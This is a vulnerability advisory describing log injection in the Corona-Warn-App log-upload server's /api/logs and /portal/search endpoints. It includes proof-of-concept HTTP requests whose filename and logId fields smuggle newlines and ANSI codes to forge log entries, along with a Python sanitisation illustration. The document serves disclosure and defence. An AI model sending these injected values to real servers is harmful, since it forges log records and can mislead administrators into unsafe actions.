The cwa-log-upload server is vulnerable to a log injection attack at two separate endpoints. This enables an unauthenticated
(as well as an authenticated) attacker to violate the integrity of the cwa-log-upload server logs by injecting
arbitrary log messages. Note that this does not affect the user-supplied log file ZIP archives, but the server's own
logging output.
The injected log entries are not easily distinguishable from legitimate entries that have been appended by the cwa-log-upload
server itself.
This issue could be abused for social engineering attacks on administrative personnel by injecting malicious messages
into log files. These could include false error conditions that instruct administrators to, for example, contact someone
or interact with services or systems by restarting them.
In this specific case, the endpoints /api/logs and /portal/search (which requires an authenticated portal user) are
affected.
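As an added illustration (not code from the cwa-log-upload project), the following Python script decodes the logId payload from the /portal/search request shown below, simulates the server writing it to its log with and without sanitisation, and then parses the console output using the Spring Boot record format that appears on this page. The simulated log message text and the sanitising function are assumptions; the same sanitisation would apply to the multipart filename accepted at /api/logs.

```python
import re
import urllib.parse

# Spring Boot console record as shown on this page (ANSI colour codes removed):
# 2021-05-07 17:10:17.277  INFO [cwa-log-upload,,] 50287 --- [           main] a.c.logupload.LogUploadApplication : msg
SPRING_RECORD = re.compile(
    r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}\s+(?P<level>[A-Z]+)\s+\[(?P<app>[^\]]*)\]\s*"
    r"(?P<pid>\d+)\s+---\s+\[\s*(?P<thread>[^\]]*)\]\s+(?P<logger>\S+)\s+:\s+(?P<msg>.*)$"
)
ANSI_SGR = re.compile(r"\x1b\[[0-9;]*m")

# Constructed copy of the logId value from the /portal/search request on this page: a leading newline, then a forged record.
INJECTED_LOGID = urllib.parse.unquote_plus(
    "%0a%1B%5B2m2021-05-07+17%3A10%3A17.277%1B%5B0%3B39m+%1B%5B32m+INFO+%5Bcwa-log-upload%2C%2C%5D%1B"
    "%5B0%3B39m+%1B%5B35m50287%1B%5B0%3B39m+%1B%5B2m---%1B%5B0%3B39m+%1B%5B2m%5B+++++++++++main%5D"
    "%1B%5B0%3B39m+%1B%5B36ma.c.logupload.LogUploadApplication++++++%1B%5B0%3B39m+%1B%5B2m%3A%1B%5"
    "B0%3B39m+Injected+Log+Line"
)

def sanitize_for_log(value: str) -> str:
    """Replace CR, LF and every other control character (ESC included, so no ANSI colour
    sequence survives) with a visible escape: the value can no longer start a new record."""
    out = []
    for ch in value:
        if ch == "\n":
            out.append("\\n")
        elif ch == "\r":
            out.append("\\r")
        elif ord(ch) < 0x20 or ch == "\x7f":
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(ch)
    return "".join(out)

def log_search_request(log_id: str, sanitize: bool) -> str:
    """Simulate the server writing one record about a portal search (hypothetical message text);
    sanitize=False is the vulnerable behaviour, sanitize=True the hardened one."""
    shown = sanitize_for_log(log_id) if sanitize else log_id
    return ("2021-05-07 17:25:38.120  INFO [cwa-log-upload,,] 50287 --- [           main] "
            f"a.c.logupload.LogUploadApplication : portal search for logId={shown}")

def parse_records(console_output: str) -> list:
    """Return every console line that reads as a complete Spring Boot record."""
    records = []
    for line in ANSI_SGR.sub("", console_output).splitlines():
        match = SPRING_RECORD.match(line)
        if match:
            records.append(match.groupdict())
    return records
```

Without sanitisation the single write produces two records, the second of which is indistinguishable from a genuine LogUploadApplication entry; with sanitisation the payload stays inside one record as visible escapes.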
The following request and response show a successfully injected log entry via the /api/logs endpoint:
POST /api/logs HTTP/1.1
Host: localhost:8085
User-Agent: curl/7.64.1
Accept: */*
Content-Type: multipart/form-data; boundary=11D989FA-25A8-4082-A4D2-703A4A27D392
Cwa-Otp: 357CC67D-3D97-4E4F-8F5B-E4730B71B4BD
Content-Length: 881
Connection: close
--11D989FA-25A8-4082-A4D2-703A4A27D392
Content-Disposition:form-data; name="file"; filename="filename.txt
[2m2021-05-07 17:10:17.277 [0;39m [32m INFO [cwa-log-upload,,] [0;39m [35m50287 [0;39m [2m--- [0;39m [2m[ main] [0;39m [36ma.c.logupload.LogUploadApplication [0;39m [2m: [0;39m Injected Log Line
Content-Type:application/zip
Content-Length: 458
PK [...]
--11D989FA-25A8-4082-A4D2-703A4A27D392--
HTTP/1.1 201
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: application/json
Date: Fri, 07 May 2021 15:14:58 GMT
Connection: close
Content-Length: 63
{"id":"C0B1DBCE400C8610C2FE","hash":"PthK38bUN7JLVgyyk8PmpQ=="}
The following request and response show a successfully injected log entry via the /portal/search endpoint, which requires an
authenticated user.
POST /portal/search HTTP/1.1
Host: localhost:8085
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8085
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8085/portal/start?
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,de;q=0.7
Cookie: JSESSIONID=0DD040DF4AD43C531993DD103AE948BE
Content-Length: 357
logId=%0a%1B%5B2m2021-05-07+17%3A10%3A17.277%1B%5B0%3B39m+%1B%5B32m+INFO+%5Bcwa-log-upload%2C%2C%5D%1B%5B0%3B39m+%1B%5B35m50287%1B%5B0%3B39m+%1B%5B2m---%1B%5B0%3B39m+%1B%5B2m%5B+++++++++++main%5D%1B%5B0%3B39m+%1B%5B36ma.c.logupload.LogUploadApplication++++++%1B%5B0%3B39m+%1B%5B2m%3A%1B%5B0%3B39m+Injected+Log+Line&_csrf=6a896d20-cdb6-42b5-bd2f-f94e49752a67
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Language: en-GB
Date: Fri, 07 May 2021 15:25:38 GMT
Connection: close
Content-Length: 1458
<!DOCTYPE html>
<html lang="de">
<head>
<meta charset="utf-8"/>
<meta content="default-src 'self' style-src 'unsafe-inline'" http-equiv="Content-Security-Policy">
<meta content="width=device-width, initial-scale=1.0" name="viewport"/>
<link href="/portal/static/css/cwa.css" rel="stylesheet" type="text/css"/>
<title>Corona Warn App - Log Upload</title>
<link href="/portal/static/img/c-19_logo.png" rel="icon"/>
<script src="/portal/static/js/logout.js"></script>
</head>
<body>
[...]